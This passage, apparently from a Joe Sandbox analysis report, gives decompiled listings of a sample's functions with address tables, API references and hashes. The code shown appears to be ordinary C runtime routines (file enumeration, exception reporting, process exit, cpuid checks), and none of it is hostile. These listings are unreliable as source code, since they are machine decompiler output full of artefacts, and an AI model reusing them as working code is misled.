				signed int _t143;
				signed int _t149;
				void* _t155;
				signed int _t158;
				intOrPtr _t160;
				void* _t161;
				void* _t165;
				void* _t166;
				signed int _t167;
				signed int _t170;
				void* _t171;
				signed int _t172;
				void* _t173;
				void* _t174;

				_push(__ecx);
				_t133 = _a4;
				_t155 = _t133 + 1;
				do {
					_t68 =  *_t133;
					_t133 = _t133 + 1;
				} while (_t68 != 0);
				_t158 = _a12;
				_t135 = _t133 - _t155 + 1;
				_v8 = _t135;
				if(_t135 <=  !_t158) {
					_push(__esi);
					_t126 = _t158 + 1 + _t135;
					_t165 = E011971A3(_t126, 1);
					__eflags = _t158;
					if(_t158 == 0) {
						L7:
						_push(_v8);
						_t126 = _t126 - _t158;
						_t73 = E0119BAB9(_t165 + _t158, _t126, _a4);
						_t172 = _t171 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t130 = _a16;
							_t118 = E01197C4C(_t130);
							_v8 = _t118;
							__eflags = _t118;
							if(_t118 == 0) {
								 *( *(_t130 + 4)) = _t165;
								_t167 = 0;
								_t14 = _t130 + 4;
								 *_t14 =  *(_t130 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E011963FE(_t165);
								_t167 = _v8;
							}
							E011963FE(0);
							_t121 = _t167;
							goto L4;
						}
					} else {
						_push(_t158);
						_t123 = E0119BAB9(_t165, _t126, _a8);
						_t172 = _t171 + 0x10;
						__eflags = _t123;
						if(_t123 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E011964E1();
							asm("int3");
							_t170 = _t172;
							_t173 = _t172 - 0x298;
							_t75 =  *0x11a7210; // 0x1c85f4c4
							_v48 = _t75 ^ _t170;
							_t138 = _v32;
							_t156 = _v28;
							_push(_t126);
							_push(0);
							_t160 = _v36;
							_v648 = _t156;
							__eflags = _t138 - _t160;
							if(_t138 != _t160) {
								while(1) {
									_t116 =  *_t138;
									__eflags = _t116 - 0x2f;
									if(_t116 == 0x2f) {
										break;
									}
									__eflags = _t116 - 0x5c;
									if(_t116 != 0x5c) {
										__eflags = _t116 - 0x3a;
										if(_t116 != 0x3a) {
											_t138 = E0119BBC0(_t160, _t138);
											__eflags = _t138 - _t160;
											if(_t138 != _t160) {
												continue;
											}
										}
									}
									break;
								}
								_t156 = _v612;
							}
							_t77 =  *_t138;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t127 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t127;
								_v668 = _t127;
								_push(_t165);
								asm("sbb eax, eax");
								_v664 = _t127;
								_v660 = _t127;
								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
								_v656 = _t127;
								_v652 = _t127;
								_t84 = E01197883(_t138 - _t160 + 1, _t160,  &_v672, E011977EB(_t156, __eflags));
								_t174 = _t173 + 0xc;
								asm("sbb eax, eax");
								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
								__eflags = _t166 - 0xffffffff;
								if(_t166 != 0xffffffff) {
									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t143;
									_t144 = _t143 >> 2;
									_v644 = _t143 >> 2;
									do {
										_v636 = _t127;
										_v632 = _t127;
										_v628 = _t127;
										_v624 = _t127;
										_v620 = _t127;
										_v616 = _t127;
										_t94 = E01197B7D( &(_v604.cFileName),  &_v636,  &_v605, E011977EB(_t156, __eflags));
										_t174 = _t174 + 0x10;
										asm("sbb eax, eax");
										_t97 =  !( ~_t94) & _v628;
										__eflags =  *_t97 - 0x2e;
										if( *_t97 != 0x2e) {
											L34:
											_push(_v612);
											_t98 = E01197CD3(_t144, _t166, _t97, _t160, _v640);
											_t174 = _t174 + 0x10;
											_v648 = _t98;
											__eflags = _t98;
											if(_t98 != 0) {
												__eflags = _v616 - _t127;
												if(_v616 != _t127) {
													E011963FE(_v628);
													_t98 = _v648;
												}
												_t127 = _t98;
											} else {
												goto L35;
											}
										} else {
											_t144 =  *((intOrPtr*)(_t97 + 1));
											__eflags = _t144;
											if(_t144 == 0) {
												goto L35;
											} else {
												__eflags = _t144 - 0x2e;
												if(_t144 != 0x2e) {
													goto L34;
												} else {
													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
														goto L35;
													} else {
														goto L34;
													}
												}
											}
										}
										L43:
										FindClose(_t166);
										goto L44;
										L35:
										__eflags = _v616 - _t127;
										if(_v616 != _t127) {
											E011963FE(_v628);
											_pop(_t144);
										}
										__eflags = FindNextFileW(_t166,  &_v604);
									} while (__eflags != 0);
									_t106 = _v612;
									_t149 = _v644;
									_t156 =  *_t106;
									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
									__eflags = _t149 - _t109;
									if(_t149 != _t109) {
										E0119B630(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E01197FDB);
									}
									goto L43;
								} else {
									_push(_v612);
									_t127 = E01197CD3( &_v604, _t166, _t160, _t127, _t127);
								}
								L44:
								__eflags = _v652;
								_pop(_t165);
								if(_v652 != 0) {
									E011963FE(_v664);
								}
								_t100 = _t127;
							} else {
								__eflags = _t138 - _t160 + 1;
								if(_t138 == _t160 + 1) {
									_t77 = _v605;
									goto L23;
								} else {
									_push(_t156);
									_t100 = E01197CD3(_t138, _t165, _t160, 0, 0);
								}
							}
							_pop(_t161);
							__eflags = _v12 ^ _t170;
							_pop(_t128);
							return E01191F25(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
						} else {
							goto L7;
						}
					}
				} else {
					_t121 = 0xc;
					L4:
					return _t121;
				}
			}


































































                                          0x01197cd8
                                          0x01197cd9
                                          0x01197cdc
                                          0x01197cdf
                                          0x01197cdf
                                          0x01197ce1
                                          0x01197ce2
                                          0x01197ce7
                                          0x01197cee
                                          0x01197cf1
                                          0x01197cf6
                                          0x01197cff
                                          0x01197d03
                                          0x01197d0d
                                          0x01197d11
                                          0x01197d13
                                          0x01197d27
                                          0x01197d27
                                          0x01197d2a
                                          0x01197d34
                                          0x01197d39
                                          0x01197d3c
                                          0x01197d3e
                                          0x00000000
                                          0x01197d40
                                          0x01197d40
                                          0x01197d45
                                          0x01197d4c
                                          0x01197d4f
                                          0x01197d51
                                          0x01197d62
                                          0x01197d64
                                          0x01197d66
                                          0x01197d66
                                          0x01197d66
                                          0x01197d53
                                          0x01197d54
                                          0x01197d59
                                          0x01197d5c
                                          0x01197d6b
                                          0x01197d71
                                          0x00000000
                                          0x01197d74
                                          0x01197d15
                                          0x01197d15
                                          0x01197d1b
                                          0x01197d20
                                          0x01197d23
                                          0x01197d25
                                          0x01197d77
                                          0x01197d79
                                          0x01197d7a
                                          0x01197d7b
                                          0x01197d7c
                                          0x01197d7d
                                          0x01197d7e
                                          0x01197d83
                                          0x01197d87
                                          0x01197d89
                                          0x01197d8f
                                          0x01197d96
                                          0x01197d99
                                          0x01197d9c
                                          0x01197d9f
                                          0x01197da0
                                          0x01197da1
                                          0x01197da4
                                          0x01197daa
                                          0x01197dac
                                          0x01197dae
                                          0x01197dae
                                          0x01197db0
                                          0x01197db2
                                          0x00000000
                                          0x00000000
                                          0x01197db4
                                          0x01197db6
                                          0x01197db8
                                          0x01197dba
                                          0x01197dc5
                                          0x01197dc7
                                          0x01197dc9
                                          0x00000000
                                          0x00000000
                                          0x01197dc9
                                          0x01197dba
                                          0x00000000
                                          0x01197db6
                                          0x01197dcb
                                          0x01197dcb
                                          0x01197dd1
                                          0x01197dd3
                                          0x01197dd9
                                          0x01197ddb
                                          0x01197dfd
                                          0x01197dfd
                                          0x01197dff
                                          0x01197e01
                                          0x01197e0d
                                          0x01197e0d
                                          0x01197e03
                                          0x01197e03
                                          0x01197e05
                                          0x00000000
                                          0x01197e07
                                          0x01197e07
                                          0x01197e09
                                          0x01197e0b
                                          0x00000000
                                          0x00000000
                                          0x01197e0b
                                          0x01197e05
                                          0x01197e15
                                          0x01197e1d
                                          0x01197e23
                                          0x01197e24
                                          0x01197e26
                                          0x01197e2e
                                          0x01197e34
                                          0x01197e3a
                                          0x01197e40
                                          0x01197e54
                                          0x01197e59
                                          0x01197e64
                                          0x01197e7a
                                          0x01197e7c
                                          0x01197e7f
                                          0x01197ea2
                                          0x01197ea2
                                          0x01197ea4
                                          0x01197ea7
                                          0x01197ead
                                          0x01197ead
                                          0x01197eb3
                                          0x01197eb9
                                          0x01197ebf
                                          0x01197ec5
                                          0x01197ecb
                                          0x01197eec
                                          0x01197ef1
                                          0x01197ef6
                                          0x01197efa
                                          0x01197f00
                                          0x01197f03
                                          0x01197f16
                                          0x01197f16
                                          0x01197f24
                                          0x01197f29
                                          0x01197f2c
                                          0x01197f32
                                          0x01197f34
                                          0x01197f92
                                          0x01197f98
                                          0x01197fa0
                                          0x01197fa5
                                          0x01197fab
                                          0x01197fac
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197f05
                                          0x01197f05
                                          0x01197f08
                                          0x01197f0a
                                          0x00000000
                                          0x01197f0c
                                          0x01197f0c
                                          0x01197f0f
                                          0x00000000
                                          0x01197f11
                                          0x01197f11
                                          0x01197f14
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197f14
                                          0x01197f0f
                                          0x01197f0a
                                          0x01197fae
                                          0x01197faf
                                          0x00000000
                                          0x01197f36
                                          0x01197f36
                                          0x01197f3c
                                          0x01197f44
                                          0x01197f49
                                          0x01197f49
                                          0x01197f58
                                          0x01197f58
                                          0x01197f60
                                          0x01197f66
                                          0x01197f6c
                                          0x01197f73
                                          0x01197f76
                                          0x01197f78
                                          0x01197f88
                                          0x01197f8d
                                          0x00000000
                                          0x01197e81
                                          0x01197e81
                                          0x01197e92
                                          0x01197e92
                                          0x01197fb5
                                          0x01197fb5
                                          0x01197fbc
                                          0x01197fbd
                                          0x01197fc5
                                          0x01197fca
                                          0x01197fcb
                                          0x01197ddd
                                          0x01197de0
                                          0x01197de2
                                          0x01197df7
                                          0x00000000
                                          0x01197de4
                                          0x01197de4
                                          0x01197dea
                                          0x01197def
                                          0x01197de2
                                          0x01197fd0
                                          0x01197fd1
                                          0x01197fd3
                                          0x01197fda
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197d25
                                          0x01197cf8
                                          0x01197cfa
                                          0x01197cfb
                                          0x01197cfd
                                          0x01197cfd

                                          APIs
                                            • Part of subcall function 011971A3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01195671,00000001,00000364,00000007,000000FF,?,01198694,?,00000004,00000000,?,?), ref: 011971E4
                                          • _free.LIBCMT ref: 01197D54
                                          • _free.LIBCMT ref: 01197D6B
                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01197E74
                                          • _free.LIBCMT ref: 01197F44
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 01197F52
                                          • _free.LIBCMT ref: 01197FA0
                                          • FindClose.KERNEL32(00000000), ref: 01197FAF
                                          • _free.LIBCMT ref: 01197FC5
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free$Find$File$AllocateCloseFirstHeapNext
                                          • String ID:
                                          • API String ID: 4129390288-0
                                          • Opcode ID: 4160eb7b92469dae0cc395446a7c4568e23d32d050348bc952e89d0b77c19ce3
                                          • Instruction ID: c2c0df3e13878fd59c9e14126ca417a87d0c8c73a594b3e340242717521292fd
                                          • Opcode Fuzzy Hash: 4160eb7b92469dae0cc395446a7c4568e23d32d050348bc952e89d0b77c19ce3
                                          • Instruction Fuzzy Hash: 15513C729141196FEF2D9F6C9C84AFEBBF9DF85218F144199E47997280EB308D418F60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01191B31 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E01191B31(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E01191AD6(_t34);
				 *_t60 = 0x2cc;
				_v632 = E011928D0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E011928D0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E01191AD6(_t49);
				}
				return _t49;
			}


































                                          0x01191b31
                                          0x01191b31
                                          0x01191b31
                                          0x01191b45
                                          0x01191b47
                                          0x01191b4a
                                          0x01191b4a
                                          0x01191b4e
                                          0x01191b53
                                          0x01191b6b
                                          0x01191b71
                                          0x01191b77
                                          0x01191b7d
                                          0x01191b83
                                          0x01191b89
                                          0x01191b8f
                                          0x01191b96
                                          0x01191b9d
                                          0x01191ba4
                                          0x01191bab
                                          0x01191bb2
                                          0x01191bb9
                                          0x01191bba
                                          0x01191bc3
                                          0x01191bc9
                                          0x01191bcc
                                          0x01191bd2
                                          0x01191be1
                                          0x01191bed
                                          0x01191bf8
                                          0x01191bff
                                          0x01191c06
                                          0x01191c11
                                          0x01191c19
                                          0x01191c22
                                          0x01191c24
                                          0x01191c27
                                          0x01191c29
                                          0x01191c33
                                          0x01191c3b
                                          0x01191c41
                                          0x00000000
                                          0x01191c48
                                          0x01191c4b

                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 01191B3D
                                          • IsDebuggerPresent.KERNEL32 ref: 01191C09
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01191C29
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 01191C33
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                          • String ID:
                                          • API String ID: 254469556-0
                                          • Opcode ID: b12007bfa2dd2201cadcd800c1a5d3c7ea11c1522bb35698c506037681da095b
                                          • Instruction ID: 070282b953b8cc633145ebb5ad88b63defc47702d59f79f8fc66df80b7541f88
                                          • Opcode Fuzzy Hash: b12007bfa2dd2201cadcd800c1a5d3c7ea11c1522bb35698c506037681da095b
                                          • Instruction Fuzzy Hash: 4F312775D45219EBDF20DFA4D9897CCBBB8AF08304F5040AAE41DAB240EB715A848F44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01196515 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E01196515(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x11a7210; // 0x1c85f4c4
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E01191AD6(_t41);
					_pop(_t61);
				}
				E011928D0(_t66,  &_v804, 0, 0x50);
				E011928D0(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E01191AD6(_t57);
				}
				return E01191F25(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}





































                                          0x01196515
                                          0x01196515
                                          0x01196515
                                          0x01196520
                                          0x01196525
                                          0x01196527
                                          0x0119652f
                                          0x01196531
                                          0x01196534
                                          0x01196539
                                          0x01196539
                                          0x01196545
                                          0x01196558
                                          0x01196566
                                          0x0119656c
                                          0x01196572
                                          0x01196578
                                          0x0119657e
                                          0x01196584
                                          0x0119658a
                                          0x01196590
                                          0x01196596
                                          0x0119659c
                                          0x011965a3
                                          0x011965aa
                                          0x011965b1
                                          0x011965b8
                                          0x011965bf
                                          0x011965c6
                                          0x011965c7
                                          0x011965d0
                                          0x011965d6
                                          0x011965d9
                                          0x011965df
                                          0x011965ec
                                          0x011965f5
                                          0x011965fe
                                          0x01196607
                                          0x01196615
                                          0x01196617
                                          0x0119662c
                                          0x01196638
                                          0x0119663b
                                          0x01196640
                                          0x0119664d

                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0119660D
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 01196617
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 01196624
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 9f451520db643e60386415689afcb0c5da1d6c81b0ec1f5786071f1662eede40
                                          • Instruction ID: 69d90695400516dead5465419b184b9efce537f97b3eee26fbe6724dcc930189
                                          • Opcode Fuzzy Hash: 9f451520db643e60386415689afcb0c5da1d6c81b0ec1f5786071f1662eede40
                                          • Instruction Fuzzy Hash: 7831D274901229ABCF25DF28D8887DCBBB8BF18314F5041EAE42CA6250EB709B858F44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01192D34 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01192D34(int _a4) {
				void* _t14;

				if(E01196ECB(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E01192CE1(_t14, _a4);
				ExitProcess(_a4);
			}




                                          0x01192d41
                                          0x01192d5d
                                          0x01192d5d
                                          0x01192d66
                                          0x01192d6f

                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,01192DEC,?,?,?,?,?,0119ABA6), ref: 01192D56
                                          • TerminateProcess.KERNEL32(00000000,?,01192DEC,?,?,?,?,?,0119ABA6), ref: 01192D5D
                                          • ExitProcess.KERNEL32 ref: 01192D6F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: 05744053e586bf09d9a2aeecd5a6f5ba73837466d77c80a414381e8ba845d71c
                                          • Instruction ID: 026eae3c0dfa3b6bc1136ab25d6387fd0b2e5165a74236d6784cd473f18dff3e
                                          • Opcode Fuzzy Hash: 05744053e586bf09d9a2aeecd5a6f5ba73837466d77c80a414381e8ba845d71c
                                          • Instruction Fuzzy Hash: DAE08231404108BFCFBA6F68D988A5C3FBAFF00A41F404020F9248A122CB79ED82CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01191D45 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E01191D45(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t104;

				_t90 = __edx;
				 *0x11a8d08 =  *0x11a8d08 & 0x00000000;
				 *0x11a7218 =  *0x11a7218 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0x11a8d0c;
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x11a8d0c = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x11a7218; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x11a8d08 = 1;
					 *0x11a7218 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x11a8d08 = 2;
						 *0x11a7218 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x11a7218; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x11a8d08 = 3;
								 *0x11a7218 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x11a8d08 = 5;
									 *0x11a7218 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x11a7218 =  *0x11a7218 | 0x00000040;
										 *0x11a8d08 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t96 =  *0x11a8d0c | 0x00000001;
					 *0x11a8d0c = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}





























                                          0x01191d45
                                          0x01191d48
                                          0x01191d52
                                          0x01191d63
                                          0x01191f15
                                          0x01191f18
                                          0x01191f18
                                          0x01191d69
                                          0x01191d6f
                                          0x01191d74
                                          0x01191d78
                                          0x01191d7c
                                          0x01191d7e
                                          0x01191d80
                                          0x01191d83
                                          0x01191d88
                                          0x01191d91
                                          0x01191da2
                                          0x01191dad
                                          0x01191db3
                                          0x01191db4
                                          0x01191dba
                                          0x01191dbd
                                          0x01191dc7
                                          0x01191dca
                                          0x01191dcd
                                          0x01191dd0
                                          0x01191e15
                                          0x01191e15
                                          0x01191e1b
                                          0x01191e1b
                                          0x01191e20
                                          0x01191e21
                                          0x01191e27
                                          0x01191e59
                                          0x01191e29
                                          0x01191e2b
                                          0x01191e2c
                                          0x01191e32
                                          0x01191e35
                                          0x01191e37
                                          0x01191e3a
                                          0x01191e3d
                                          0x01191e40
                                          0x01191e43
                                          0x01191e4c
                                          0x01191e51
                                          0x01191e51
                                          0x01191e4c
                                          0x01191e5c
                                          0x01191e61
                                          0x01191e64
                                          0x01191e6e
                                          0x01191e79
                                          0x01191e7f
                                          0x01191e82
                                          0x01191e8c
                                          0x01191e97
                                          0x01191ea3
                                          0x01191ea6
                                          0x01191ea9
                                          0x01191eb4
                                          0x01191eb9
                                          0x01191ebb
                                          0x01191ec0
                                          0x01191ec3
                                          0x01191ecd
